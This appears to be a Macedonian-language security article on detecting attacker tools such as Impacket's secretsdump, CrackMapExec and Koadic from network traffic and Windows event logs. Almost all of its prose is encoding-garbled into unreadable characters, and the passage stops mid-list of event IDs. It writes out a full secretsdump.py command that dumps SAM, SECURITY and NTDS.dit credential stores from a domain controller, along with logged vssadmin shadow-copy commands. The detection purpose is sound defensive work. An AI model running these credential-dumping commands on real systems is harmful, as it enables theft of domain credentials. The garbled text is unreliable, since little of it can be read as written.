ΠΡΠΎΡΠΎΡ Π½Π° Π½Π°ΠΏΠ°Π΄ΠΈ Π²ΠΎ ΠΊΠΎΡΠΏΠΎΡΠ°ΡΠΈΠ²Π½ΠΈΠΎΡ ΡΠ΅ΠΊΡΠΎΡ ΡΠ°ΡΡΠ΅ ΡΠ΅ΠΊΠΎΡΠ° Π³ΠΎΠ΄ΠΈΠ½Π°: Π½Π° ΠΏΡΠΈΠΌΠ΅Ρ
ΠΡΠ΅Π΄ΠΈ Π΄Π° ΡΠ΅ Π½Π°ΠΏΠΎΠΌΠ΅Π½Π΅ Π΄Π΅ΠΊΠ° ΠΎΠ²ΠΈΠ΅ Π°Π»Π°ΡΠΊΠΈ Π½Π΅ ΡΠ΅ ΠΊΠΎΡΠΈΡΡΠ°Ρ Π·Π° ΠΏΠΎΡΠ΅ΡΠ½Π° ΠΏΠ΅Π½Π΅ΡΡΠ°ΡΠΈΡΠ°, ΡΡΠΊΡ Π·Π° ΡΠ°Π·Π²ΠΎΡ Π½Π° Π½Π°ΠΏΠ°Π΄ Π²ΠΎ ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ°ΡΠ°. ΠΠ°ΠΏΠ°ΡΠ°ΡΠΈΡΠ΅ Π³ΠΈ ΠΊΠΎΡΠΈΡΡΠ°Ρ Π²ΠΎ ΡΠ°Π·Π»ΠΈΡΠ½ΠΈ ΡΠ°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ ΠΏΠΎ ΠΏΠ΅Π½Π΅ΡΡΠ°ΡΠΈΡΠ°ΡΠ° Π½Π° ΠΏΠ΅ΡΠΈΠΌΠ΅ΡΠ°ΡΠΎΡ. ΠΠ²Π°, ΠΈΠ½Π°ΠΊΡ, Π΅ ΡΠ΅ΡΠΊΠΎ Π΄Π° ΡΠ΅ ΠΎΡΠΊΡΠΈΠ΅ ΠΈ ΡΠ΅ΡΡΠΎ ΡΠ°ΠΌΠΎ ΡΠΎ ΠΏΠΎΠΌΠΎΡ Π½Π° ΡΠ΅Ρ
Π½ΠΎΠ»ΠΎΠ³ΠΈΡΠ°ΡΠ°
Π¨ΡΠΎ ΡΡΠ΅Π±Π°ΡΠ΅ Π΄Π° Π½Π°ΠΏΡΠ°Π²ΠΈΠΌΠ΅:
- Π Π°Π·Π±Π΅ΡΠ΅ΡΠ΅ ΠΊΠ°ΠΊΠΎ ΡΡΠ½ΠΊΡΠΈΠΎΠ½ΠΈΡΠ°Π°Ρ Π°Π»Π°ΡΠΊΠΈΡΠ΅ Π·Π° Ρ Π°ΠΊΠΈΡΠ°ΡΠ΅. ΠΠΎΠ·Π½Π°ΡΡΠ΅ ΡΡΠΎ ΡΡΠ΅Π±Π° Π΄Π° ΠΈΡΠΊΠΎΡΠΈΡΡΠ°Ρ Π½Π°ΠΏΠ°ΡΠ°ΡΠΈΡΠ΅ ΠΈ ΠΊΠΎΠΈ ΡΠ΅Ρ Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ ΠΌΠΎΠΆΠ°Ρ Π΄Π° Π³ΠΈ ΠΊΠΎΡΠΈΡΡΠ°Ρ.
- ΠΠ°ΡΠ΄Π΅ΡΠ΅ Π³ΠΎ ΠΎΠ½Π° ΡΡΠΎ Π½Π΅ Π΅ ΠΎΡΠΊΡΠΈΠ΅Π½ΠΎ ΠΎΠ΄ Π°Π»Π°ΡΠΊΠΈΡΠ΅ Π·Π° Π±Π΅Π·Π±Π΅Π΄Π½ΠΎΡΡ Π½Π° ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΠΈ Π²ΠΎ ΠΏΡΠ²ΠΈΡΠ΅ ΡΠ°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ. Π€Π°Π·Π°ΡΠ° Π½Π° ΠΈΠ·Π²ΠΈΠ΄ΡΠ²Π°ΡΠ΅ ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ ΠΏΡΠ΅ΡΠΊΠΎΠΊΠ½Π΅, ΠΈΠ»ΠΈ Π·Π°ΡΠΎΠ° ΡΡΠΎ Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ Π΅ Π²Π½Π°ΡΡΠ΅ΡΠ΅Π½ Π½Π°ΠΏΠ°ΡΠ°Ρ, ΠΈΠ»ΠΈ Π·Π°ΡΠΎΠ° ΡΡΠΎ Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ Π΅ΠΊΡΠΏΠ»ΠΎΠ°ΡΠΈΡΠ° Π΄ΡΠΏΠΊΠ° Π²ΠΎ ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ°ΡΠ° ΠΊΠΎΡΠ° ΠΏΡΠ΅ΡΡ ΠΎΠ΄Π½ΠΎ Π½Π΅ Π±ΠΈΠ»Π° ΠΏΠΎΠ·Π½Π°ΡΠ°. Π‘ΡΠ°Π½ΡΠ²Π° Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎ Π΄Π° ΡΠ΅ Π²ΡΠ°ΡΠΈ ΡΠ΅Π»ΠΈΠΎΡ ΡΠΈΠ½ΡΠΈΡ Π½Π° Π½Π΅Π³ΠΎΠ²ΠΈΡΠ΅ ΠΏΠΎΡΡΠ°ΠΏΠΊΠΈ, ΠΏΠ° ΠΎΡΡΡΠΊΠ° ΠΈ ΠΆΠ΅Π»Π±Π°ΡΠ° Π΄Π° ΡΠ΅ ΠΎΡΠΊΡΠΈΠ΅ ΠΏΠΎΠ½Π°ΡΠ°ΠΌΠΎΡΠ½ΠΎ Π΄Π²ΠΈΠΆΠ΅ΡΠ΅.
- ΠΠ»ΠΈΠΌΠΈΠ½ΠΈΡΠ°ΡΡΠ΅ Π³ΠΈ Π»Π°ΠΆΠ½ΠΈΡΠ΅ ΠΏΠΎΠ·ΠΈΡΠΈΠ²ΠΈ ΠΎΠ΄ Π°Π»Π°ΡΠΊΠΈΡΠ΅ Π·Π° ΠΎΡΠΊΡΠΈΠ²Π°ΡΠ΅ Π½Π° ΡΠΏΠ°Π΄. ΠΠ΅ ΡΠΌΠ΅Π΅ΠΌΠ΅ Π΄Π° Π·Π°Π±ΠΎΡΠ°Π²ΠΈΠΌΠ΅ Π΄Π΅ΠΊΠ° ΠΊΠΎΠ³Π° ΠΎΠ΄ΡΠ΅Π΄Π΅Π½ΠΈ Π΄Π΅ΡΡΡΠ²Π° ΡΠ΅ ΠΎΡΠΊΡΠΈΠ²Π°Π°Ρ ΡΠ°ΠΌΠΎ Π²ΡΠ· ΠΎΡΠ½ΠΎΠ²Π° Π½Π° ΠΈΠ·Π²ΠΈΠ΄ΡΠ²Π°ΡΠ΅, ΠΌΠΎΠΆΠ½ΠΈ ΡΠ΅ ΡΠ΅ΡΡΠΈ Π³ΡΠ΅ΡΠΊΠΈ. ΠΠΎΠΎΠ±ΠΈΡΠ°Π΅Π½ΠΎ Π²ΠΎ ΠΈΠ½ΡΡΠ°ΡΡΡΡΠΊΡΡΡΠ°ΡΠ° ΠΈΠΌΠ° Π΄ΠΎΠ²ΠΎΠ»Π΅Π½ Π±ΡΠΎΡ Π½Π°ΡΠΈΠ½ΠΈ, ΠΊΠΎΠΈ Π½Π΅ ΡΠ΅ ΡΠ°Π·Π»ΠΈΠΊΡΠ²Π°Π°Ρ ΠΎΠ΄ Π»Π΅Π³ΠΈΡΠΈΠΌΠ½ΠΈΡΠ΅ Π½Π° ΠΏΡΠ² ΠΏΠΎΠ³Π»Π΅Π΄, Π·Π° Π΄Π° ΡΠ΅ Π΄ΠΎΠ±ΠΈΠ΅ ΠΊΠ°ΠΊΠ²Π° Π±ΠΈΠ»ΠΎ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΡΠ°.
Π¨ΡΠΎ ΠΈΠΌ Π΄Π°Π²Π°Π°Ρ ΠΎΠ²ΠΈΠ΅ Π°Π»Π°ΡΠΊΠΈ Π½Π° Π½Π°ΠΏΠ°ΡΠ°ΡΠΈΡΠ΅? ΠΠΊΠΎ ΠΎΠ²Π° Π΅ Impacket, ΡΠΎΠ³Π°Ρ Π½Π°ΠΏΠ°ΡΠ°ΡΠΈΡΠ΅ Π΄ΠΎΠ±ΠΈΠ²Π°Π°Ρ Π³ΠΎΠ»Π΅ΠΌΠ° Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠ° Π½Π° ΠΌΠΎΠ΄ΡΠ»ΠΈ ΠΊΠΎΠΈ ΠΌΠΎΠΆΠ°Ρ Π΄Π° ΡΠ΅ ΠΊΠΎΡΠΈΡΡΠ°Ρ Π²ΠΎ ΡΠ°Π·Π»ΠΈΡΠ½ΠΈ ΡΠ°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ ΡΡΠΎ ΡΠ»Π΅Π΄Π°Ρ ΠΏΠΎ ΠΏΡΠΎΠ±ΠΈΠ²Π°ΡΠ΅ Π½Π° ΠΏΠ΅ΡΠΈΠΌΠ΅ΡΠ°ΡΠΎΡ. ΠΠ½ΠΎΠ³Ρ Π°Π»Π°ΡΠΊΠΈ ΠΊΠΎΡΠΈΡΡΠ°Ρ Impacket ΠΌΠΎΠ΄ΡΠ»ΠΈ Π²Π½Π°ΡΡΠ΅ΡΠ½ΠΎ - Π½Π° ΠΏΡΠΈΠΌΠ΅Ρ, Metasploit. ΠΠΌΠ° dcomexec ΠΈ wmiexec Π·Π° Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠΎ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ, secretsdump Π·Π° Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ ΡΠΌΠ΅ΡΠΊΠΈ ΠΎΠ΄ ΠΌΠ΅ΠΌΠΎΡΠΈΡΠ°ΡΠ° ΡΡΠΎ ΡΠ΅ Π΄ΠΎΠ΄Π°Π΄Π΅Π½ΠΈ ΠΎΠ΄ Impacket. ΠΠ°ΠΊΠΎ ΡΠ΅Π·ΡΠ»ΡΠ°Ρ Π½Π° ΡΠΎΠ°, ΠΏΡΠ°Π²ΠΈΠ»Π½ΠΎΡΠΎ ΠΎΡΠΊΡΠΈΠ²Π°ΡΠ΅ Π½Π° Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΠ° Π½Π° ΡΠ°ΠΊΠ²Π°ΡΠ° Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠ° ΡΠ΅ ΠΎΠ±Π΅Π·Π±Π΅Π΄ΠΈ ΠΎΡΠΊΡΠΈΠ²Π°ΡΠ΅ Π½Π° Π΄Π΅ΡΠΈΠ²Π°ΡΠΈ.
ΠΠ΅ Π΅ ΡΠ»ΡΡΠ°ΡΠ½ΠΎ ΡΡΠΎ ΠΊΡΠ΅Π°ΡΠΎΡΠΈΡΠ΅ Π½Π°ΠΏΠΈΡΠ°Π° βPowered by Impacketβ Π·Π° CrackMapExec (ΠΈΠ»ΠΈ Π΅Π΄Π½ΠΎΡΡΠ°Π²Π½ΠΎ CME). ΠΠΎΠΊΡΠ°Ρ ΡΠΎΠ°, CME ΠΈΠΌΠ° Π³ΠΎΡΠΎΠ²Π° ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»Π½ΠΎΡΡ Π·Π° ΠΏΠΎΠΏΡΠ»Π°ΡΠ½ΠΈ ΡΡΠ΅Π½Π°ΡΠΈΡΠ°: Mimikatz Π·Π° Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ Π»ΠΎΠ·ΠΈΠ½ΠΊΠΈ ΠΈΠ»ΠΈ Π½ΠΈΠ²Π½ΠΈ Ρ Π°ΡΠΎΠ²ΠΈ, ΠΈΠΌΠΏΠ»Π΅ΠΌΠ΅Π½ΡΠ°ΡΠΈΡΠ° Π½Π° Meterpreter ΠΈΠ»ΠΈ Empire Π°Π³Π΅Π½Ρ Π·Π° Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠΎ ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ ΠΈ Bloodhound Π½Π° ΠΎΠ΄Π±ΠΎΡΠΎΡ.
Π’ΡΠ΅ΡΠ°ΡΠ° Π°Π»Π°ΡΠΊΠ° ΡΡΠΎ ΡΠ° ΠΈΠ·Π±ΡΠ°Π²ΠΌΠ΅ Π±Π΅ΡΠ΅ Koadic. Π’ΠΎΡ Π΅ ΡΠΎΡΠ΅ΠΌΠ° Π½Π΅ΠΎΠ΄Π°ΠΌΠ½Π΅ΡΠ΅Π½, Π±Π΅ΡΠ΅ ΠΏΡΠ΅ΡΡΡΠ°Π²Π΅Π½ Π½Π° ΠΌΠ΅ΡΡΠ½Π°ΡΠΎΠ΄Π½Π°ΡΠ° Ρ Π°ΠΊΠ΅ΡΡΠΊΠ° ΠΊΠΎΠ½ΡΠ΅ΡΠ΅Π½ΡΠΈΡΠ° DEFCON 25 Π²ΠΎ 2017 Π³ΠΎΠ΄ΠΈΠ½Π° ΠΈ ΡΠ΅ ΠΎΠ΄Π»ΠΈΠΊΡΠ²Π° ΡΠΎ Π½Π΅ΡΡΠ°Π½Π΄Π°ΡΠ΄Π΅Π½ ΠΏΡΠΈΡΡΠ°ΠΏ: ΡΠ°Π±ΠΎΡΠΈ ΠΏΡΠ΅ΠΊΡ HTTP, Java Script ΠΈ Microsoft Visual Basic Script (VBS). ΠΠ²ΠΎΡ ΠΏΡΠΈΡΡΠ°ΠΏ ΡΠ΅ Π½Π°ΡΠ΅ΠΊΡΠ²Π° ΠΆΠΈΠ²Π΅Π΅ΡΠ΅ Π½Π°Π΄Π²ΠΎΡ ΠΎΠ΄ Π·Π΅ΠΌΡΠ°ΡΠ°: Π°Π»Π°ΡΠΊΠ°ΡΠ° ΠΊΠΎΡΠΈΡΡΠΈ Π·Π±ΠΈΡ Π½Π° Π·Π°Π²ΠΈΡΠ½ΠΎΡΡΠΈ ΠΈ Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠΈ Π²Π³ΡΠ°Π΄Π΅Π½ΠΈ Π²ΠΎ Windows. ΠΡΠ΅Π°ΡΠΎΡΠΈΡΠ΅ Π³ΠΎ Π½Π°ΡΠ΅ΠΊΡΠ²Π°Π°Ρ COM Command & Control, ΠΈΠ»ΠΈ C3.
IMPACKET
Π€ΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»Π½ΠΎΡΡΠ° Π½Π° Impacket Π΅ ΠΌΠ½ΠΎΠ³Ρ ΡΠΈΡΠΎΠΊΠ°, ΠΏΠΎΡΠ½ΡΠ²Π°ΡΡΠΈ ΠΎΠ΄ ΠΈΠ·Π²ΠΈΠ΄ΡΠ²Π°ΡΠ΅ Π²ΠΎ AD ΠΈ ΡΠΎΠ±ΠΈΡΠ°ΡΠ΅ ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈ ΠΎΠ΄ Π²Π½Π°ΡΡΠ΅ΡΠ½ΠΈ MS SQL ΡΠ΅ΡΠ²Π΅ΡΠΈ, Π΄ΠΎ ΡΠ΅Ρ Π½ΠΈΠΊΠΈ Π·Π° Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ Π°ΠΊΡΠ΅Π΄ΠΈΡΠΈΠ²ΠΈ: ΠΎΠ²Π° Π΅ SMB ΡΠ΅Π»Π΅ Π½Π°ΠΏΠ°Π΄ ΠΈ Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ Π½Π° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ°ΡΠ° ntds.dit ΠΊΠΎΡΠ° ΡΠΎΠ΄ΡΠΆΠΈ Ρ Π°Ρ Π½Π° ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΊΠΈ Π»ΠΎΠ·ΠΈΠ½ΠΊΠΈ ΠΎΠ΄ ΠΊΠΎΠ½ΡΡΠΎΠ»Π΅Ρ Π½Π° Π΄ΠΎΠΌΠ΅Π½. Impacket, ΠΈΡΡΠΎ ΡΠ°ΠΊΠ°, ΠΈΠ·Π²ΡΡΡΠ²Π° ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΎΠ΄ Π΄Π°Π»Π΅ΡΠΈΠ½Π° ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ ΡΠ΅ΡΠΈΡΠΈ ΡΠ°Π·Π»ΠΈΡΠ½ΠΈ ΠΌΠ΅ΡΠΎΠ΄ΠΈ: WMI, Π£ΡΠ»ΡΠ³Π° Π·Π° ΡΠΏΡΠ°Π²ΡΠ²Π°ΡΠ΅ ΡΠΎ ΡΠ°ΡΠΏΠΎΡΠ΅Π΄ΡΠ²Π°Ρ Π½Π° Windows, DCOM ΠΈ SMB ΠΈ Π±Π°ΡΠ° ΠΈΠ½Π³Π΅ΡΠ΅Π½ΡΠΈΠΈ Π·Π° ΡΠΎΠ°.
Secretsdump
ΠΡΠ΄Π΅ Π΄Π° ΠΏΠΎΠ³Π»Π΅Π΄Π½Π΅ΠΌΠ΅ Π²ΠΎ secretsdump. ΠΠ²Π° Π΅ ΠΌΠΎΠ΄ΡΠ» ΠΊΠΎΡ ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ ΡΠ°ΡΠ³Π΅ΡΠΈΡΠ° ΠΈ ΠΊΠΎΡΠΈΡΠ½ΠΈΡΠΊΠΈΡΠ΅ ΠΌΠ°ΡΠΈΠ½ΠΈ ΠΈ ΠΊΠΎΠ½ΡΡΠΎΠ»ΠΎΡΠΈΡΠ΅ Π½Π° Π΄ΠΎΠΌΠ΅Π½ΠΈ. ΠΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ ΠΊΠΎΡΠΈΡΡΠΈ Π·Π° Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ ΠΊΠΎΠΏΠΈΠΈ ΠΎΠ΄ ΠΌΠ΅ΠΌΠΎΡΠΈΡΠΊΠΈΡΠ΅ ΠΎΠ±Π»Π°ΡΡΠΈ LSA, SAM, SECURITY, NTDS.dit, ΡΠ°ΠΊΠ° ΡΡΠΎ ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ Π²ΠΈΠ΄ΠΈ Π²ΠΎ ΡΠ°Π·Π»ΠΈΡΠ½ΠΈ ΡΠ°Π·ΠΈ ΠΎΠ΄ Π½Π°ΠΏΠ°Π΄ΠΎΡ. ΠΡΠ²ΠΈΠΎΡ ΡΠ΅ΠΊΠΎΡ Π²ΠΎ ΡΠ°Π±ΠΎΡΠ°ΡΠ° Π½Π° ΠΌΠΎΠ΄ΡΠ»ΠΎΡ Π΅ Π°Π²ΡΠ΅Π½ΡΠΈΠΊΠ°ΡΠΈΡΠ° ΠΏΡΠ΅ΠΊΡ SMB, ΡΡΠΎ Π±Π°ΡΠ° ΠΈΠ»ΠΈ Π»ΠΎΠ·ΠΈΠ½ΠΊΠ°ΡΠ° Π½Π° ΠΊΠΎΡΠΈΡΠ½ΠΈΠΊΠΎΡ ΠΈΠ»ΠΈ Π½Π΅ΡΠ·ΠΈΠ½ΠΈΠΎΡ Ρ Π°Ρ Π·Π° Π°Π²ΡΠΎΠΌΠ°ΡΡΠΊΠΈ Π΄Π° Π³ΠΎ ΠΈΠ·Π²ΡΡΠΈ Π½Π°ΠΏΠ°Π΄ΠΎΡ Pass the Hash. Π‘Π»Π΅Π΄Π½ΠΎ Π΄ΠΎΠ°ΡΠ° Π±Π°ΡΠ°ΡΠ΅ Π΄Π° ΡΠ΅ ΠΎΡΠ²ΠΎΡΠΈ ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ Service Control Manager (SCM) ΠΈ Π΄Π° ΡΠ΅ Π΄ΠΎΠ±ΠΈΠ΅ ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ ΡΠ΅Π³ΠΈΡΡΠ°ΡΠΎΡ ΠΏΡΠ΅ΠΊΡ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΡ winreg, ΡΠΎ ΠΊΠΎΡ Π½Π°ΠΏΠ°ΡΠ°ΡΠΎΡ ΠΌΠΎΠΆΠ΅ Π΄Π° Π³ΠΈ Π΄ΠΎΠ·Π½Π°Π΅ ΠΏΠΎΠ΄Π°ΡΠΎΡΠΈΡΠ΅ ΠΎΠ΄ Π³ΡΠ°Π½ΠΊΠΈΡΠ΅ ΠΎΠ΄ ΠΈΠ½ΡΠ΅ΡΠ΅Ρ ΠΈ Π΄Π° Π΄ΠΎΠ±ΠΈΠ΅ ΡΠ΅Π·ΡΠ»ΡΠ°ΡΠΈ ΠΏΡΠ΅ΠΊΡ SMB.
ΠΠ° ΡΠ». 1 Π³Π»Π΅Π΄Π°ΠΌΠ΅ ΠΊΠ°ΠΊΠΎ ΡΠΎΡΠ½ΠΎ ΠΊΠΎΠ³Π° ΡΠ΅ ΠΊΠΎΡΠΈΡΡΠΈ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΡ winreg, ΠΏΡΠΈΡΡΠ°ΠΏΠΎΡ ΡΠ΅ Π΄ΠΎΠ±ΠΈΠ²Π° ΡΠΎ ΠΏΠΎΠΌΠΎΡ Π½Π° ΠΊΠ»ΡΡ Π·Π° ΡΠ΅Π³ΠΈΡΡΠ°Ρ ΡΠΎ LSA. ΠΠ° Π΄Π° Π³ΠΎ Π½Π°ΠΏΡΠ°Π²ΠΈΡΠ΅ ΠΎΠ²Π°, ΠΊΠΎΡΠΈΡΡΠ΅ΡΠ΅ ΡΠ° ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° DCERPC ΡΠΎ ΠΎΠΏΡΠΈΡΠΊΠΈ ΠΊΠΎΠ΄ 15 - OpenKey.
ΠΡΠΈΠ·. 1. ΠΡΠ²ΠΎΡΠ°ΡΠ΅ ΡΠ΅Π³ΠΈΡΡΠ°ΡΡΠΊΠΈ ΠΊΠ»ΡΡ ΡΠΎ ΠΏΠΎΠΌΠΎΡ Π½Π° ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΡ winreg
Π‘Π»Π΅Π΄Π½ΠΎ, ΠΊΠΎΠ³Π° ΡΠ΅ ΡΠ΅ Π΄ΠΎΠ±ΠΈΠ΅ ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ ΠΊΠ»ΡΡΠΎΡ, Π²ΡΠ΅Π΄Π½ΠΎΡΡΠΈΡΠ΅ ΡΠ΅ Π·Π°ΡΡΠ²ΡΠ²Π°Π°Ρ ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ° SaveKey ΡΠΎ ΠΎΠΏΡΠΈΡΠΊΠΈ ΠΊΠΎΠ΄ 20. Impacket Π³ΠΎ ΠΏΡΠ°Π²ΠΈ ΡΠΎΠ° Π½Π° ΠΌΠ½ΠΎΠ³Ρ ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ΅Π½ Π½Π°ΡΠΈΠ½. ΠΠΈ Π·Π°ΡΡΠ²ΡΠ²Π° Π²ΡΠ΅Π΄Π½ΠΎΡΡΠΈΡΠ΅ Π²ΠΎ Π΄Π°ΡΠΎΡΠ΅ΠΊΠ° ΡΠΈΠ΅ ΠΈΠΌΠ΅ Π΅ Π½ΠΈΠ·Π° ΠΎΠ΄ 8 ΡΠ»ΡΡΠ°ΡΠ½ΠΈ Π·Π½Π°ΡΠΈ Π΄ΠΎΠ΄Π°Π΄Π΅Π½ΠΈ ΡΠΎ .tmp. ΠΠΎΠΏΠΎΠ»Π½ΠΈΡΠ΅Π»Π½ΠΎ, ΠΏΠΎΠ½Π°ΡΠ°ΠΌΠΎΡΠ½ΠΎΡΠΎ ΠΏΠΎΡΡΠ°Π²ΡΠ²Π°ΡΠ΅ Π½Π° ΠΎΠ²Π°Π° Π΄Π°ΡΠΎΡΠ΅ΠΊΠ° ΡΠ΅ ΡΠ»ΡΡΡΠ²Π° ΠΏΡΠ΅ΠΊΡ SMB ΠΎΠ΄ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΠΌΠΎΡ System32 (ΡΠ». 2).
ΠΡΠΈΠ·. 2. Π¨Π΅ΠΌΠ° Π·Π° Π΄ΠΎΠ±ΠΈΠ²Π°ΡΠ΅ ΡΠ΅Π³ΠΈΡΡΠ°ΡΡΠΊΠΈ ΠΊΠ»ΡΡ ΠΎΠ΄ ΠΎΠ΄Π΄Π°Π»Π΅ΡΠ΅Π½Π° ΠΌΠ°ΡΠΈΠ½Π°
ΠΠ·Π»Π΅Π³ΡΠ²Π° Π΄Π΅ΠΊΠ° ΡΠ°ΠΊΠ²Π°ΡΠ° Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡ Π½Π° ΠΌΡΠ΅ΠΆΠ°ΡΠ° ΠΌΠΎΠΆΠ΅ Π΄Π° ΡΠ΅ ΠΎΡΠΊΡΠΈΠ΅ ΡΠΎ ΠΏΡΠ°ΡΠ°ΡΠ° Π΄ΠΎ ΠΎΠ΄ΡΠ΅Π΄Π΅Π½ΠΈ Π³ΡΠ°Π½ΠΊΠΈ Π½Π° ΡΠ΅Π³ΠΈΡΡΠ°ΡΠΎΡ ΠΊΠΎΡΠΈΡΡΠ΅ΡΡΠΈ Π³ΠΎ ΠΏΡΠΎΡΠΎΠΊΠΎΠ»ΠΎΡ winreg, ΡΠΏΠ΅ΡΠΈΡΠΈΡΠ½ΠΈ ΠΈΠΌΠΈΡΠ°, ΠΊΠΎΠΌΠ°Π½Π΄ΠΈ ΠΈ Π½ΠΈΠ²Π½ΠΈΠΎΡ ΡΠ΅Π΄ΠΎΡΠ»Π΅Π΄.
ΠΠ²ΠΎΡ ΠΌΠΎΠ΄ΡΠ», ΠΈΡΡΠΎ ΡΠ°ΠΊΠ°, ΠΎΡΡΠ°Π²Π° ΡΡΠ°Π³ΠΈ Π²ΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ Π·Π° Π½Π°ΡΡΠ°Π½ΠΈ Π½Π° Windows, ΡΡΠΎ Π³ΠΎ ΠΎΠ»Π΅ΡΠ½ΡΠ²Π° ΠΎΡΠΊΡΠΈΠ²Π°ΡΠ΅ΡΠΎ. ΠΠ° ΠΏΡΠΈΠΌΠ΅Ρ, ΠΊΠ°ΠΊΠΎ ΡΠ΅Π·ΡΠ»ΡΠ°Ρ Π½Π° ΠΈΠ·Π²ΡΡΡΠ²Π°ΡΠ΅ Π½Π° ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ°
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
ΠΠΎ Π΄Π½Π΅Π²Π½ΠΈΠΊΠΎΡ Π½Π° Windows Server 2016 ΡΠ΅ ΡΠ° Π²ΠΈΠ΄ΠΈΠΌΠ΅ ΡΠ»Π΅Π΄Π½Π°ΡΠ° ΠΊΠ»ΡΡΠ½Π° Π½ΠΈΠ·Π° Π½Π° Π½Π°ΡΡΠ°Π½ΠΈ:
1. 4624 - Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠΎ Π½Π°ΡΠ°Π²ΡΠ²Π°ΡΠ΅.
2. 5145 - ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° Π½Π° ΠΏΡΠ°Π²Π°ΡΠ° Π·Π° ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ Π΄Π°Π»Π΅ΡΠΈΠ½ΡΠΊΠ°ΡΠ° ΡΡΠ»ΡΠ³Π° winreg.
3. 5145 - ΠΏΡΠΎΠ²Π΅ΡΠΊΠ° Π½Π° ΠΏΡΠ°Π²Π°ΡΠ° Π·Π° ΠΏΡΠΈΡΡΠ°ΠΏ Π΄ΠΎ Π΄Π°ΡΠΎΡΠ΅ΠΊΠΈ Π²ΠΎ Π΄ΠΈΡΠ΅ΠΊΡΠΎΡΠΈΡΠΌΠΎΡ System32. ΠΠ°ΡΠΎΡΠ΅ΠΊΠ°ΡΠ° Π³ΠΎ ΠΈΠΌΠ° ΡΠ»ΡΡΠ°ΡΠ½ΠΎΡΠΎ ΠΈΠΌΠ΅ ΡΠΏΠΎΠΌΠ΅Π½Π°ΡΠΎ ΠΏΠΎΠ³ΠΎΡΠ΅.
4. 4688 - ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ cmd.exe ΡΡΠΎ Π³ΠΎ ΡΡΠ°ΡΡΡΠ²Π° vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ°:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - ΡΠΎΠ·Π΄Π°Π²Π°ΡΠ΅ ΠΏΡΠΎΡΠ΅Ρ ΡΠΎ ΠΊΠΎΠΌΠ°Π½Π΄Π°ΡΠ°:
